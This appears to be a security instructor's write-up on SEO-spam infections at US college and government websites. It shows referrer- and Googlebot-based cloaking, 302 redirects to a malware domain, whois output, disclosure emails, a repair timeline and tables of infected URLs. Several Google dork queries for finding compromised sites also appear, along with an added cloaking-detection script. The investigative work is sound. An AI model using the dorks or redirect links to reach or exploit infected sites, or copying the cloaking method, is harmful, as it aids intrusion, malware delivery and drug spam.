I have not identified the attackers, but they used a domain (SECUREDATA24.COM) registered in Hong Kong and a relay server in Amsterdam, so they seem pretty well-hidden. That domain is not currently on blacklists, but it should certainly be added to them immediately.
This infection is also quite subtle, and would not be easily detected by students or staff of the college. As far as I can tell, the malware is not delivered to people who use the website normally.
However, since the attacker was able to insert malware into several pages at KWC, and to insert a 302 redirect into the Apache configuration, they have a large incident response obligation now.
I highly recommend that KWC hire a security consultant to analyze their systems, to determine how the attack was done, and how much damage was done. They may be subject to legal notification requirements if personal data or health-related information was exposed.
More notifications:
http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp%C3%A2%E2%82%AC%C5%BD
After useless notification to the website admin, I emailed the President and "Assistant Vice President for Planning" as detailed here:
http://www.chatham.edu/about/presidents_staff.cfm
Warning: The pages I am examining here contain malware, so if you try this yourself, be careful!
inurl:edu viagra-online-100mg
As you can see, there are 1.8 million hits:
Clicking one of the hits in Google redirects to this page:
However, copying and pasting the URL leads to a clean page:
The Google cache shows the defacement:
I changed my User Agent to the Googlebot and saw the same thing.
This is clever, and I imagine it's a good way to persist on a server for a long time. Real links used by students and staff go to clean pages, but people coming in from Google get redirected to malicious sites.
curl http://www.kwc.edu > kwc-normal.htm
Here's how that site's source code looks.
Notice the small setCookie and getCookie functions:
Then I fetched the infected page:
curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://www.kwc.edu > kwc-google.htm
The dirty one shows the infection in its source code:
I noticed these items:
<!-- d90fd6da5bb59c807b28b07724dc0506 -->
This appears to be a hash that identifies the website.
Googling it shows this interesting hit:
I don't know what mawords is; but I decided not to investigate it further right now.
<style>
.8tolyqpt {
position:absolute; left:4000px;
}
</style>
This conceals the injected code by placing it 4000 pixels to the right, which I tested using this page:
http://www.w3schools.com/cssref/tryit.asp?filename=trycss_position_relative
However, the way this code is inserted, inside a for loop in a function in the head, I don't think it will ever be rendered.
I think its purpose is to feed the Googlebot keywords about Viagra, so people shopping for Viagra will find this page.
And my Avast antivirus was blocking the page now.
So I moved to a Kali Linux virtual machine, turned off Avast, and ran Wireshark while loading the page from the Google hits to get the whole story.
It's very simple. The Google link fetches the KWC page, but the infected server returns a 302 redirect to a securedata24.com link:
I googled that domain, and it is apparently not known as a malware host:
So I turned my antivirus back on and tried to go there, but it seems to have no Website.
Here are some more links showing information about it. It's an 8-month-old domain in Amsterdam that does not seem to have been used to host any real website.
http://domainagecheck.com/domain/securedata24.com
Securedata24.com may not be a known malware host, but it's sure serving up malware now.
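A site owner can run the three requests compared above (a plain fetch, a fetch with the Googlebot User-Agent, and a click-through carrying a Google Referer) in one pass and diff the results. This is an added example, not code from the original post; the sample responses are constructed from the details above, and the term list, the 1000px threshold, the Referer value and the redirect path placeholder are assumptions.

```python
"""Compare one URL's responses under several request profiles to spot cloaking."""
import re
import sys
import urllib.error
import urllib.request
from typing import NamedTuple, Optional
from urllib.parse import urlparse


class Response(NamedTuple):
    status: int
    location: Optional[str]  # Location header on a 3xx, else None
    body: str


# Request profiles matching the three tests in the write-up.
PROFILES = {
    "direct": {},
    "googlebot": {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"},
    "google_referer": {"Referer": "http://www.google.com/url?sa=t"},  # assumed value
}
SPAM_TERMS = ("viagra", "cialis", "pharmacy")  # assumption: terms seen in this campaign
MARKER_RE = re.compile(r"<!--\s*[0-9a-f]{32}\s*-->")  # 32-hex comment like the one found
OFFSCREEN_RE = re.compile(r"position\s*:\s*absolute\s*;[^}]*?left\s*:\s*(-?\d+)px", re.S)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # do not follow; the 3xx then surfaces as HTTPError


def fetch(url, extra_headers, timeout=10):
    """Fetch url once with extra_headers, reporting redirects instead of following them."""
    opener = urllib.request.build_opener(_NoRedirect)
    request = urllib.request.Request(url, headers=extra_headers)
    try:
        with opener.open(request, timeout=timeout) as resp:
            return Response(resp.status, None, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return Response(err.code, err.headers.get("Location"),
                        err.read().decode("utf-8", "replace"))


def _site(url):
    """Last two host labels: a rough same-site key (too coarse for e.g. .co.uk)."""
    host = (urlparse(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])


def _offscreen(body):
    """True if a CSS rule positions content 1000px or more off to the side."""
    return any(abs(int(m.group(1))) >= 1000 for m in OFFSCREEN_RE.finditer(body))


def indicators(url, resp, baseline):
    """List what this response shows that the baseline (direct) response does not."""
    found = []
    if resp.status in (301, 302, 303, 307, 308) and resp.location:
        target = _site(resp.location)  # empty for a relative Location
        if target and target != _site(url):
            found.append("offsite-redirect:" + target)
    body, base = resp.body.lower(), baseline.body.lower()
    new_terms = [t for t in SPAM_TERMS if t in body and t not in base]
    if new_terms:
        found.append("spam-terms:" + ",".join(new_terms))
    if MARKER_RE.search(body) and not MARKER_RE.search(base):
        found.append("hex-marker-comment")
    if _offscreen(body) and not _offscreen(base):
        found.append("offscreen-css")
    return found


def compare(url, responses):
    """Return {profile: [indicators]} for each profile that differs from 'direct'."""
    baseline = responses["direct"]
    report = {}
    for name, resp in responses.items():
        hits = indicators(url, resp, baseline) if name != "direct" else []
        if hits:
            report[name] = hits
    return report


# Constructed sample responses modelled on the behaviour described above.
SAMPLE_URL = "http://www.kwc.edu/"
SAMPLE = {
    "direct": Response(200, None, "<html><head><script>function setCookie(){}"
                       "function getCookie(){}</script></head><body>Welcome</body></html>"),
    "googlebot": Response(200, None, "<html><head><!-- d90fd6da5bb59c807b28b07724dc0506 -->"
                          "<style>.8tolyqpt {\nposition:absolute; left:4000px;\n}</style>"
                          "</head><body>viagra online 100mg</body></html>"),
    # The path is a placeholder; only the host comes from the write-up.
    "google_referer": Response(302, "http://securedata24.com/PLACEHOLDER", ""),
}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # live check of a site you operate: pass its URL
        url = sys.argv[1]
        result = compare(url, {n: fetch(url, h) for n, h in PROFILES.items()})
    else:
        result = compare(SAMPLE_URL, SAMPLE)
    for profile, hits in result.items():
        print(profile, hits)
```

An empty report only means these three profiles returned matching content; it does not rule out cloaking keyed on other request properties.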
Whois shows that it's registered from Hong Kong. Here's the Whois output with everything boring removed.
Notice the email addresses--this looks like an automatically generated domain, to be used temporarily by malware.
$ whois securedata24.com
Domain Name: SECUREDATA24.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNS-DIY.NET
Name Server: NS2.DNS-DIY.NET
Status: clientTransferProhibited
Updated Date: 01-apr-2013
Creation Date: 01-apr-2013
Expiration Date: 01-apr-2014
Domain Name:securedata24.com
Record created:4/1/2013
Record expired:04/01/2014
Domain servers in listed order:
ns1.dns-diy.net ns2.dns-diy.net
Administrat:
name-- Domain ID Shield Service
org-- Domain ID Shield Service CO., Limited
country-- CN
province-- Hong Kong
city-- Hong Kong
address-- Room 510-511A2 Nan Fung Tower., 173 Des Voeux Road C., Hong Kong
postalcode-- 999077
telephone-- +852.21581835
fax-- +852.30197491
E-mail-- se4944887232201@domainidshield.com
Technical Contact:
E-mail-- se4944887232202@domainidshield.com
Billing Contact:
E-mail-- se4944887101103@domainidshield.com
Registrant Contact:
E-mail-- se4944887101104@domainidshield.com
Their infected servers are being used now to serve malware and sell illegal drugs, and everyone can easily see it on Google searches.
I know from previous experience that some people in the security community will say I am not practicing "responsible disclosure" by publishing this immediately, but I don't agree.
The reasons to delay publication of a security finding are:
If KWC fixes it immediately, that's good. But what is the security benefit to anyone in concealing it?
If people think I am wrong, feel free to Tweet me @sambowne
I also could not find any information on how to report security incidents or how to contact the webmaster.
This situation makes them a logical target for the criminals who are using their systems, and it gives me very little hope that contacting them will do much good.
Nevertheless, I sent this email today, to admissions@kwc.edu, abuse@kwc.edu, and security@kwc.edu.
I also sent it to their Twitter account, which seems active, @kywesleyan.
Hello:
I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.
Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.
To see the infection, simply google "inurl:kwc.edu viagra-online-100mg" (without the quotation marks) and click any link. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.
I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.
Details are here: http://samsclass.info/125/proj11/subtle-infect.htm
Feel free to contact me if I can be of assistance.
After several tests, I found a URL that makes analysis easy from any device. This is the URL Google creates when a search is performed in Chrome on a MacBook Air, with all HTTPS protocols replaced by HTTP, to make sniffing easier.
I'm not linking to it, but if you copy and paste this, it works on both the MacBook Air and the iPad:
http://www.google.com/url?sa=t&rct=j&q=inurl%3Abyu.edu%20viagra-online-100mg&source=web&cd=1&ved=0CCsQFjAA&url=http%3A%2F%2Fstore.moa.byu.edu%2Flet-the-children-come-unto-me-4.html%3Fc3rvc%3D484823&ei=3G-KUpaBOqH9iwKns4DABA&usg=AFQjCNHOcrDAehTNn04aaawyLtR74fH0-g&sig2=ILvHfQ3hM5ac5mEzxgXOwA&bvm=bv.56643336,d.cGE
Visiting that link shows this page, a warning from Google:
Here's the TCP conversation from Wireshark.
Clicking the link goes to a malicious site. Here's the important TCP conversation, asking for a page about art on the BYU.EDU server, but returning a 302 redirect to the malicious server securedata24.com:
For future reference, here are handy URLs to use to see the infections at other colleges:
TSU:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fcost.tsu.edu%2FWebPages%2FNews.php%3FIndex%3D79%26y29zd%3D516464&ei=LoeKUpLWGcipiAKFqYH4Cw&usg=AFQjCNFpEj2OtWBmIffLAlpUmlcz_6VvtA&sig2=jFkx4c8JV4ipWCsboh6P2g&bvm=bv.56643336,d.cGE
UTS:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCwQFjAA&url=http%3A%2F%2Fjournals.uts.edu%2Fvolume-x-2009%2F345-heavenly-mother.html%3Fam91c%3D580274&ei=dIeKUuLRA6WUiAL_ioHgCA&usg=AFQjCNFRtTIgxgHX1tzigDQW8KF0K3AAzQ&sig2=uh9NB_CAM6FKzlkNfSmKfQ&bvm=bv.56643336,d.cGE
Here's a link to the simpler infection at Chatham:
http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp%C3%A2%E2%82%AC%C5%BD
Using them, I verified that all four sites are still infected on 11-18-13.
BYU, TSU, and UTS are still infected at 3:13 pm on 11-19-13.
Repair Timeline
11/20/13 6:00 am: All 19 infected
11/20/13 2:10 pm: 7 cleaned, 12 still infected
11/21/13 3:50 pm: 5 cleaned, 14 still infected (3 cleaned changed to infected, one infected changed to cleaned)
12/2/13 6:00 am: 6 cleaned, 13 still infected
12/4/13 6:12 am: 5 cleaned, 14 still infected
KWC: 6 of the first ten hits for "site:kwc.edu buy viagra" are still infected. The original reported link was fixed but came back.
12-4-13 6:12 am testing; all unchanged except 16 is now re-infected
DAVIDSON: 9 of the first ten hits for "site:DAVIDSON.EDU online canadian pharmacy" are infected. The original reported link was fixed but came back.
UCSC: All of the first ten hits for "site:ucsc.edu viagra" are infected. The reported link was fixed, but came back the next day. Santa Cruz is nearby--I'd love to visit and see this thing from the inside. I want to find the best way to clean it, and get malware samples so we can recognize it and get it added to antivirus databases, if appropriate.
NCSU: 9 of the first ten hits for "site:ncsu.edu drug prices" are infected. The reported link was fixed, but came back the next day.
I used this Google search:
inurl:edu intitle:viagra
Here are the colleges that were infected, as of 9 am 11-20-13, with URLs that go to malicious pages (don't load them on an unprotected system).
Some of these are duplicates of infections I found previously, but I decided to include them all and try again to notify them, since clearly nothing has yet been fixed.
College | Emails | Malicious URL |
---|---|---|
1. UA.EDU Alabama @UofAlabama |
community.affairs@ua.edu dlamb@fa.ua.edu mbownes@uasystem.ua.edu pdunn@uasystem.ua.edu Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
dateline.ua.edu/viagra-online-san-marino |
2. KWC.EDU Kentucky |
debbiebe@kwc.edu kpayne@kwc.edu admissions@kwc.edu krutherman@kwc.edu jkuhlman@kwc.edu
Fixed when tested on 11-21-13 |
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFEQFjADOAo&url=http%3A%2F%2Fwww.kwc.edu%2Fpage.php%3Fpage%3D1135%26a3djl%3D983496&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEiL4qQXQCr2r1e3A_WyyBLyQd_oA&sig2=NZKJE8w7An68ASRJ1c5oOw&bvm=bv.56643336,d.cGE |
3. WWW.COLBYCC.EDU Kansas |
george.mcnulty@colbycc.edu pat.erickson@colbycc.edu gregory.nichols@colbycc.edu debbie.schwanke@colbycc.edu
Still infected on 11-21-13 & 12-2-13 |
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CFoQFjAEOAo&url=http%3A%2F%2Fwww.colbycc.edu%2F%3Fy29sy%3D393622&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEMa4eororLMbHVZWEEDXbEuRtL6w&sig2=KAmjrkyaLDsx4kbYnVhnxA&bvm=bv.56643336,d.cGE |
4. PARSONS.EDU New York |
BrinkmaG@newschool.edu ByfieldT@newschool.edu chacina@newschool.edu thinkparsons@newschool.edu thinkparsonsgrad@newschool.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CHMQFjAHOAo&url=http%3A%2F%2Fpetlab.parsons.edu%2Famd%2Ftop-selling-herbal-viagra%2F&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEy90ifx_7mMfJ8-33q1BtvsgMIlw&sig2=GsyEvUhGOgLBmOjkRet1Rg&bvm=bv.56643336,d.cGE |
5. BERKELEY.EDU California @UCBerkeley |
andypino@berkeley.edu rsanders@berkeley.edu CHANCELLOR@BERKELEY.EDU AUDIT@BERKELEY.EDU Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fchl.berkeley.edu%2F2010%2F7%2Fpost2614%2Fgenerika-viagra-cialis&ei=h-6MUs2HMeWJiALw54GYBA&usg=AFQjCNHcFI6QMWqu9HavksN9ZJxDX2XxSw&sig2=AY8Em7IGIrVOcovf31xXgA&bvm=bv.56643336,d.cGE |
6. DAVIDSON.EDU North Carolina |
president@davidson.edu raramanujan@davidson.edu tichartier@davidson.edu edkania@davidson.edu Fixed at 2:10 PM 11-20-13!
Infected again on 11-21-13; still infected 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEwQFjAEOB4&url=http%3A%2F%2Fdavidsonjournal.davidson.edu%2Findex.php%2Forder-discount-viagra-online%2F&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNFDRXMeEhVChigdkrC195RjUjoqDA&sig2=pXpBFiT855lPJlspneGhag&bvm=bv.56643336,d.cGE |
7. WCU.EDU North Carolina |
webmaster@wcu.edu wkbrenton@wcu.edu lgaetano@email.wcu.edu cfowler@email.wcu.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGwQFjAIOB4&url=http%3A%2F%2Fsandbox.wcu.edu%2Fthisweek%2Fincludes%2Finc.php%3Fp%3Dcialis-viagra-combination&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNEW9BZ2mWPOB43LBWF4OuL21Jsn2Q&sig2=MXCEs5aOsizDlC4mgDcXtQ&bvm=bv.56643336,d.cGE |
8. UTS.EDU New York |
None
Still infected on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHMQFjAJOB4&url=http%3A%2F%2Fwww.journals.uts.edu%2Fvolume-vi-2004-2005%2F%3Fam91c%3D262389&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNGcE9zwkt03RPPgYdeHQGowq9Fwwg&sig2=0Y4BGf3Oo6bE59dziYdZKQ&bvm=bv.56643336,d.cGE |
9. TSU.EDU Texas |
rudleyjm@TSU.EDU Griffin_ka@TSU.EDU yu_lx@tsu.edu yu_lx@tsu.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CCsQFjAAOCg&url=http%3A%2F%2Ftransportation.tsu.edu%2FTrans_Server%2FCTTR4TransportationServ%2Fwww.tsu.edu%2Fcore%2Fmanager%2Fpagemgrcontrolled%2Fpagepreviewa1b5.html%3Fdhjhb%3D659796&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEzQ1LWShwoZdS9bWWrBCI2rqY_mA&sig2=UAXm8ivGAqOeLck7qOub6w&bvm=bv.56643336,d.cGE |
10. WWCC.EDU Washington |
steven.vanausdle@wwcc.edu i.ramsey@wwcc.edu wendy.samitore@wwcc.edu webmaster@wwcc.edu general@wwcc.edu
Still infected on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=42&ved=0CDMQFjABOCg&url=http%3A%2F%2Fwww.wwcc.edu%2FCMS%2F%3Fid%3D835%26d3djy%3D424667&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNH3lPzl2i_UxOxJ-KX8GLlFD3ehOg&sig2=eLp2d_CKlugzm2AKKNkf5Q&bvm=bv.56643336,d.cGE |
11. NMSU.EDU New Mexico |
ckottong@nmsu.edu audit@nmsu.edu ovprweb@nmsu.edu hamid@nmsu.edu abuse@nmsu.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=43&ved=0CD8QFjACOCg&url=http%3A%2F%2Fchss.nmsu.edu%2Fprospective-students%2Fvisit-our-college%2F%3Fy2hzc%3D725794&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNFx77pUP7lp83FUoOcRg7vO9gaivA&sig2=kyQaW-1TG4jdFlvHqmVkDA&bvm=bv.56643336,d.cGE |
12. WBU.EDU Texas @WaylandBaptist |
webmaster@wbu.edu armesp@wbu.edu lezlieh@wbu.edu vhart@wbu.edu
Still infected on 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=44&ved=0CEcQFjADOCg&url=http%3A%2F%2Fwww.wbu.edu%2Flog%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNGa6pq_p4K5RnHVlADKZZ7_MmlB4Q&sig2=duTiMSV_HHvyn4jOZQmzGw&bvm=bv.56643336,d.cGE |
13. UCSC.EDU California |
help@ucsc.edu chancellor@ucsc.edu mdoyle1@ucsc.edu yiz@soe.ucsc.edu Fixed at 2:10 PM 11-20-13!
Infected again on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CE4QFjAEOCg&url=http%3A%2F%2Fpromweek.soe.ucsc.edu%2F%3Fp%3D1594&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNE10sG-np9zjvxKNCwSuoYSum43RQ&sig2=CJ2ShwPqc65tupSuhtP9hQ&bvm=bv.56643336,d.cGE |
14. VT.EDU Virginia Tech @vtnews |
president@vt.edu rittenfa@vt.edu gscales@vt.edu lhaugh@vt.edu Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=49&ved=0CGwQFjAIOCg&url=http%3A%2F%2Fdendro.cnre.vt.edu%2Fdoctor%2Fgeneric-viagra-india%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNG7gtb95z5zjjqG4gpnKRW3M_2pDw&sig2=kEw8sKJTDhFvTQsJ0UNy-Q&bvm=bv.56643336,d.cGE |
15. UARK.EDU Arkansas @UArkansas |
chancell@uark.edu rhudson@uark.edu dandrews@uark.edu sleeds@uark.edu Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=50&ved=0CHMQFjAJOCg&url=http%3A%2F%2Frgis.cast.uark.edu%2Findex.php%3Fq%3Dviagra-ghana&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEOAX85AJw40JaupfamewRUHoR4LA&sig2=iQHQE1WuAXjzQ-RBe2RgUA&bvm=bv.56643336,d.cGE |
16. SFASU.EDU Texas |
jstandley@sfasu.edu liasrr@sfasu.edu taylorj1@sfasu.edu jljohnstone@sfasu.edu controller@sfasu.edu
Still infected on 11-21-13 |
cte.sfasu.edu/course/?pitemx=473 |
17. ISI.EDU California |
pnataraj@isi.edu jtw@isi.edu carl@isi.edu vcomms@usc.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=66&ved=0CFYQFjAFODw&url=http%3A%2F%2Fwww.lsi.edu%2Fblog%2Fwp-content%2Fuploads%2F2008%2F10%2F%3Fvan%3Dads-for-viagra%26go%3D1&ei=TPGMUvSkMOTEigL24AE&usg=AFQjCNHvVBr3jM59GoRyzIhoUOcDEr4oNw&sig2=6jR-t1WaK5VKg9lmrCy9lQ&bvm=bv.56643336,d.cGE |
18. NCSU.EDU North Carolina |
web_feedback@ncsu.edu newstips@ncsu.edu eileen_goldgeier@ncsu.edu academic-student-affairs@ncsu.edu Fixed at 2:10 PM 11-20-13!
Infected again on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=88&ved=0CGAQFjAHOFA&url=http%3A%2F%2Femporium1.lib.ncsu.edu%2Fwolfram%2Fsounds%2F_css2.php%3Fp%3Dbuy-viagra-cialis-online&ei=jPGMUsgnqseKAuzQgIgM&usg=AFQjCNHsel9r1jcvxLie5H9cwISnUcbnFg&sig2=bgjyKXmv9HMPAq8jSaD2pg&bvm=bv.56643336,d.cGE |
19. PARKLAND.EDU Illinois |
ABlackman@parkland.edu MMobasseri@parkland.edu admissions@parkland.edu businessoffice@parkland.edu plehn@parkland.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=92&ved=0CDEQFjABOFo&url=http%3A%2F%2Fvirtual.parkland.edu%2Flanguages%2Findex.php%3Fidpost%3D3762%26join%3Dvendo-viagra-alicante&ei=HvKMUpnkFMn8iwLH7ID4Cw&usg=AFQjCNHGjmguu4NdSLeJLdcQoIVzVQk-XA&sig2=luLY594arg4CrcL2sKNbTQ&bvm=bv.56643336,d.cGE |
Today, 11-20-13, I sent notices as listed above, like this:
Subject: You have been hacked
Hello:
I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.
Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.
To see the infection, open the link below. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.
I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.
Details are here: http://samsclass.info/125/proj11/subtle-infect.htm
Feel free to contact me if I can be of assistance.
inurl:gov intitle:viagra
inurl:bank intitle:viagra
inurl:school intitle:viagra
intitle:news intitle:viagra intitle:sale
"viagra" intitle:Canadian "state college"
"viagra" intitle:Canadian "state university"
"viagra" intitle:Canadian intitle:"school of"
"viagra" intitle:Canadian intitle:"representative"
intitle:viagra intitle:Canadian council
inurl:school viagra canadian
intitle:viagra intitle:canadian Website designed and maintained by Fifth Ape Design
Since I got helpful responses from two of the colleges I notified yesterday, I changed my notification policy. I only notified the big-name schools on this list, hoping to get more good security researchers to join in so we can work together and figure this thing out. Hopefully we can post information that will be helpful to the smaller schools and organizations that have been hacked.
So I notified these schools this morning:
4. MIT.EDU
13. UCSC.EDU (the worst infection I have seen, apparently 2000 infected pages)
10. Youngstown State University
14. lyndonstate.edu
23. RUTGERS.EDU
Organization | Emails | Malicious URL |
---|---|---|
1. jamescitycountyva.gov Virginia |
webmaster@jamescitycountyva.gov security@jamescitycountyva.gov abuse@jamescitycountyva.gov Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CDQQFjABOB4&url=http%3A%2F%2Fwww.jamescitycountyva.gov%2Fonline-viagra%2F&ei=fDaNUs-oNbCQigLY5YGQCg&usg=AFQjCNGum7BrEgfm-MTUdqtWAOpKUwNK3Q&sig2=r2RrerQ90TJAEhAYnWgkkw&bvm=bv.56988011,d.cGE |
2. winchester-in.gov |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CDYQFjAAOCg&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=vzeNUpObMYPDigKxvYDADQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=abdmXrXk_PDK9oSUEwxL9Q&bvm=bv.56988011,d.cGE | |
3. chambersburgpa.gov |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=60&ved=0CHsQFjAJODI&url=http%3A%2F%2Fwww.chambersburgpa.gov%2Foldwebsite%2F&ei=rTiNUqyRL-H8igKS2IC4Cw&usg=AFQjCNG95dpcGUdKYZzkuewl_rhlP0bKfQ&sig2=59F-5abksiA6MquCxtl8IA&bvm=bv.56988011,d.cGE | |
4. MIT.EDU Massachusetts |
http://ist.mit.edu/security/report Reported 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CFsQFjAHOAo&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dfirst-viagra-bank%26cc%3D1&ei=JDqNUrbGNeKaiQLhsYC4DQ&usg=AFQjCNHbFel8qG3ng2-65UjEaj3Sv8Q-WQ&sig2=z49trmHODzk0vNW1ED9UOA
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=65&ved=0CEkQFjAEODw&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dviagra-school%26cc%3D1&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNGtatR97iw6yL7pc3OF4Hq_vlRUgQ&sig2=sq2EJRyrM4Lc_nVIAmNxfg
Not notified yet: |
5. keystonescienceschool.org Colorado |
EReid@KeystoneScienceSchool.org MNuttelman@KeystoneScienceSchool.org DMiller@KeystoneScienceSchool.org ASeidler@KeystoneScienceSchool.org Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE0QFjAE&url=http%3A%2F%2Fkeystonescienceschool.org%2Fslides%2F%3Fm%3D948&ei=4jqNUpbVEqL0iQKizIGgAg&usg=AFQjCNGRTvFfSNMffBSjPLpzzgG68nVx7A&sig2=KRRxaLdF8fKMiR3SzJ0gnQ |
6. al-imanschool.org |
None | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEQQFjACOAo&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fviagra-online-in-uk.html&ei=LzyNUtn3BeakiQKpy4HQBg&usg=AFQjCNEbYVboigtAtH_wKTKnPGUBLQ8YgA&sig2=rJRdjP-HKkhviEoTVdF0Ag |
7. thehomeschoolvillage.com |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGIQFjAHOBQ&url=http%3A%2F%2Fwww.thehomeschoolvillage.com%2F2011%2F02%2Fhigh-school-locker-2.html&ei=xTyNUpLxOcyaigLB7oHgCQ&usg=AFQjCNFjqUPD0DuwSW6G9X-GKEa6t7uJew&sig2=Skh-eaQ0zLtnGFwSLxlNbQ | |
8. borah.highschoolmedia.org |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=61&ved=0CCsQFjAAODw&url=http%3A%2F%2Fborah.highschoolmedia.org%2Fviagra%2F&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNHhKdwut5QNy56CRqhgkzXsyJAltg&sig2=WI8SoscuejnJVLGdyre-Yg | |
9. butlercountyrecycles.org Ohio |
None | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fwww.butlercountyrecycles.org%2F%3Fi%3Dlevitracialisviagra&ei=20CNUsmNOqT2iwKlmYCYDw&usg=AFQjCNENtEFWFf1ovZ5MlrNX_vyO5LaRKw&sig2=wAM-hpKyOIo-osTkKRpylw |
13. UCSC.EDU California |
help@ucsc.edu chancellor@ucsc.edu mdoyle1@ucsc.edu yiz@soe.ucsc.edu This page is still infected; notified again 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEkQFjAE&url=http%3A%2F%2Faia-society.ucsc.edu%2F.TemporaryItems%2F%3Fkukogiwa%3DNzA0OA-3D-3D%26tawyxiwa%3Dnews_viagra&ei=ykWNUpq1OoKmigL9w4DwDw&usg=AFQjCNEhu_03DihtVJicOGIIQSA35kPRTQ&sig2=URxafiN5OgOPONZpSBf-Bg
And many, many more infected pages, see https://www.google.com/#q=site:ucsc.edu+viagra |
